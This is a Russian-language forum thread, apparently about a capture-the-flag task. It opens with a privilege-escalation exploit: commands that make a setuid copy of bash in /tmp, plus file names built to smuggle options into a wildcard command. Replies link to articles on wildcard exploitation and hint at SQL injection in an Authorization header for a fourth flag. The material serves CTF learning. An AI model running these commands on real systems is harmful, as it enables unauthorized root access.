echo 'cp /bin/bash /tmp/iamthegod; chmod +s /tmp/iamthegod' > runme.sh
touch -- '-TT bash runme.sh'
touch -- '--test'


//добавлено

про wildcard символ можно почитать

https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

Лайту уважуха, крутое задание. +1 в копилку

Добавьте ссылку на райтап в первое сообщение. Как сделано и в других тасках. Спасибо

Спасибо за таск @l1ght (https://antichat.live/members/30257/), было очень интересно.

так и не понял - где 4-й флаг то?

↑ (https://antichat.live/posts/4335044/)
так и не понял - где 4-й флаг то?


Прочитайте ещё раз /threads/469355/page-3#post-4299433 (https://antichat.live/threads/469355/page-3/)

я про этот пост как раз и написал

Читал прохождение про 4-й флаг - всё закончилось на фразе "перебирая заголовки находим инъекцию в заголовке Authorization в параметре url: ...."

и что дальше? где флаг то?

↑ (https://antichat.live/posts/4335062/)
я про этот пост как раз и написал
Читал прохождение про 4-й флаг - всё закончилось на фразе "перебирая заголовки находим инъекцию в заголовке Authorization в параметре url: ...."
и что дальше? где флаг то?


Кавычку ставишь, и там флаг. Вообщем, находишь sql инъекцию и получаешь флаг, и понимание в каком направлении действовать

↑ (https://antichat.live/posts/4335065/)
Вообщем, находишь sql инъекцию и получаешь флаг, и понимание в каком направлении действовать


Блин ... не все же такие крутые как Вы и те кто нашел этот флаг

Для новичков можно более подробно разжевать где 4-й флаг? это же уже не квест, а объяснение как его пройти...

↑ (https://antichat.live/posts/4335099/)
Блин ... не все же такие крутые как Вы и те кто нашел этот флаг
Для новичков можно более подробно разжевать где 4-й флаг? это же уже не квест, а объяснение как его пройти...


ТАк в чём проблема взять и попробовать.